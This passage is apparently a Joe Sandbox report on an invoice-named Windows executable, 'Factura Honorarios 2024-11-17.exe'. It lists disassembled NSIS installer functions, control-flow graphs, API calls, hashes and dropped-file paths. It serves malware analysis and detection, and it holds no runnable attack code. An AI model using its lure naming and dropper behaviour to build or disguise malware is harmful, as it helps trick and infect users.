                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                  • String ID: 6B
                                                                                                                                  • API String ID: 3282139019-4127139157
                                                                                                                                  • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                                                  • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                                                                                                  Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 303 4039d9-4039ea call 406152 298->303 304 4039ef-4039f5 lstrcatW 298->304 307 4039fa-403a23 call 403c4a call 405c61 299->307 303->304 304->307 313 403ab5-403abd call 405c61 307->313 314 403a29-403a2e 307->314 319 403acb-403af0 LoadImageW 313->319 320 403abf-403ac6 call 4062a6 313->320 314->313 315 403a34-403a5c call 406152 314->315 315->313 325 403a5e-403a62 315->325 323 403b71-403b79 call 40140b 319->323 324 403af2-403b22 RegisterClassW 319->324 320->319 338 403b83-403b8e call 403c4a 323->338 339 403b7b-403b7e 323->339 328 403c40 324->328 329 403b28-403b6c SystemParametersInfoW CreateWindowExW 324->329 326 403a74-403a80 lstrlenW 325->326 327 403a64-403a71 call 405b86 325->327 333 403a82-403a90 lstrcmpiW 326->333 334 403aa8-403ab0 call 405b59 call 406284 326->334 327->326 332 403c42-403c49 328->332 329->323 333->334 337 403a92-403a9c GetFileAttributesW 333->337 334->313 341 403aa2-403aa3 call 405ba5 337->341 342 403a9e-403aa0 337->342 348 403b94-403bae ShowWindow call 4065ee 338->348 349 403c17-403c18 call 4053bf 338->349 339->332 341->334 342->334 342->341 356 403bb0-403bb5 call 4065ee 348->356 357 403bba-403bcc GetClassInfoW 348->357 352 403c1d-403c1f 349->352 354 403c21-403c27 352->354 355 403c39-403c3b call 40140b 352->355 354->339 362 403c2d-403c34 call 40140b 354->362 355->328 356->357 360 403be4-403c07 DialogBoxParamW call 40140b 357->360 361 403bce-403bde GetClassInfoW RegisterClassW 357->361 365 403c0c-403c15 call 4038c4 360->365 361->360 362->339 365->332
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00000000), ref: 004039F5
                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab), ref: 00403ADC
                                                                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                                                  • API String ID: 1975747703-1169551628
                                                                                                                                  • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                                                                                  • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D
                                                                                                                                  Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 383 402f70-402f87 382->383 385 402f89 383->385 386 402f8b-402f94 call 4032fb 383->386 385->386 395 402f9a-402fa1 386->395 396 4030bc-4030c4 call 402e79 386->396 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->374 391->389 415 403081-403087 391->415 392->389 420 4030c6-4030d7 392->420 399 402fa3-402fb7 call 405d35 395->399 400 40301d-403021 395->400 396->389 405 40302b-403031 399->405 418 402fb9-402fc0 399->418 404 403023-40302a call 402e79 400->404 400->405 404->405 411 403040-40304a 405->411 412 403033-40303d call 406751 405->412 411->383 419 403050 411->419 412->411 415->389 415->392 418->405 424 402fc2-402fc9 418->424 419->381 421 4030d9 420->421 422 4030df-4030e4 420->422 421->422 425 4030e5-4030eb 422->425 424->405 426 402fcb-402fd2 424->426 425->425 427 4030ed-403108 SetFilePointer call 405d35 425->427 426->405 428 402fd4-402fdb 426->428 431 40310d 427->431 428->405 430 402fdd-402ffd 428->430 430->389 432 403003-403007 430->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->405 435 403019-40301b 434->435 435->405
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-3582667746
                                                                                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                                                                                  Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 649 4062a6-4062b1 650 4062b3-4062c2 649->650 651 4062c4-4062da 649->651 650->651 652 4062e0-4062ed 651->652 653 4064f2-4064f8 651->653 652->653 656 4062f3-4062fa 652->656 654 4064fe-406509 653->654 655 4062ff-40630c 653->655 657 406514-406515 654->657 658 40650b-40650f call 406284 654->658 655->654 659 406312-40631e 655->659 656->653 658->657 661 406324-406362 659->661 662 4064df 659->662 663 406482-406486 661->663 664 406368-406373 661->664 665 4064e1-4064eb 662->665 666 4064ed-4064f0 662->666 667 406488-40648e 663->667 668 4064b9-4064bd 663->668 669 406375-40637a 664->669 670 40638c 664->670 665->653 666->653 672 406490-40649c call 4061cb 667->672 673 40649e-4064aa call 406284 667->673 675 4064cc-4064dd lstrlenW 668->675 676 4064bf-4064c7 call 4062a6 668->676 669->670 671 40637c-40637f 669->671 674 406393-40639a 670->674 671->670 677 406381-406384 671->677 687 4064af-4064b5 672->687 673->687 679 40639c-40639e 674->679 680 40639f-4063a1 674->680 675->653 676->675 677->670 683 406386-40638a 677->683 679->680 685 4063a3-4063ca call 406152 680->685 686 4063dc-4063df 680->686 683->674 698 4063d0-4063d7 call 4062a6 685->698 699 40646a-40646d 685->699 690 4063e1-4063ed GetSystemDirectoryW 686->690 691 4063ef-4063f2 686->691 687->675 689 4064b7 687->689 695 40647a-406480 call 406518 689->695 696 406461-406465 690->696 692 4063f4-406402 GetWindowsDirectoryW 691->692 693 40645d-40645f 691->693 692->693 693->696 697 406404-40640e 693->697 695->675 696->695 700 406467 696->700 703 406410-406413 697->703 704 406428-40643e SHGetSpecialFolderLocation 697->704 698->696 699->695 706 40646f-406475 lstrcatW 699->706 700->699 703->704 707 406415-40641c 703->707 708 406440-406457 SHGetPathFromIDListW CoTaskMemFree 704->708 709 406459 704->709 706->695 711 406424-406426 707->711 708->696 708->709 709->693 711->696 711->704
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000), ref: 004063FA
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000), ref: 00406436
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                                                                                                  • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000), ref: 004064CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 717251189-3216619722
                                                                                                                                  • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                                                                                  • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                                                                                                                  Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 776 40176f-401794 call 402c41 call 405bd0 781 401796-40179c call 406284 776->781 782 40179e-4017b0 call 406284 call 405b59 lstrcatW 776->782 787 4017b5-4017b6 call 406518 781->787 782->787 791 4017bb-4017bf 787->791 792 4017c1-4017cb call 4065c7 791->792 793 4017f2-4017f5 791->793 801 4017dd-4017ef 792->801 802 4017cd-4017db CompareFileTime 792->802 794 4017f7-4017f8 call 405d55 793->794 795 4017fd-401819 call 405d7a 793->795 794->795 803 40181b-40181e 795->803 804 40188d-4018b6 call 4052ec call 403116 795->804 801->793 802->801 805 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 803->805 806 40186f-401879 call 4052ec 803->806 818 4018b8-4018bc 804->818 819 4018be-4018ca SetFileTime 804->819 805->791 838 401864-401865 805->838 816 401882-401888 806->816 821 402ace 816->821 818->819 820 4018d0-4018db CloseHandle 818->820 819->820 823 4018e1-4018e4 820->823 824 402ac5-402ac8 820->824 825 402ad0-402ad4 821->825 827 4018e6-4018f7 call 4062a6 lstrcatW 823->827 828 4018f9-4018fc call 4062a6 823->828 824->821 834 401901-4022fc call 4058ea 827->834 828->834 834->825 838->816 840 401867-401868 838->840 840->806
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,?,00000031), ref: 004017B0
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,?,00000031), ref: 004017D5
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 00405359
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp$C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call
                                                                                                                                  • API String ID: 1941528284-1523810592
                                                                                                                                  • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                                                  • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                                                                                  Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 842 4052ec-405301 843 405307-405318 842->843 844 4053b8-4053bc 842->844 845 405323-40532f lstrlenW 843->845 846 40531a-40531e call 4062a6 843->846 848 405331-405341 lstrlenW 845->848 849 40534c-405350 845->849 846->845 848->844 850 405343-405347 lstrcatW 848->850 851 405352-405359 SetWindowTextW 849->851 852 40535f-405363 849->852 850->849 851->852 853 405365-4053a7 SendMessageW * 3 852->853 854 4053a9-4053ab 852->854 853->854 854->844 855 4053ad-4053b0 854->855 855->844
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
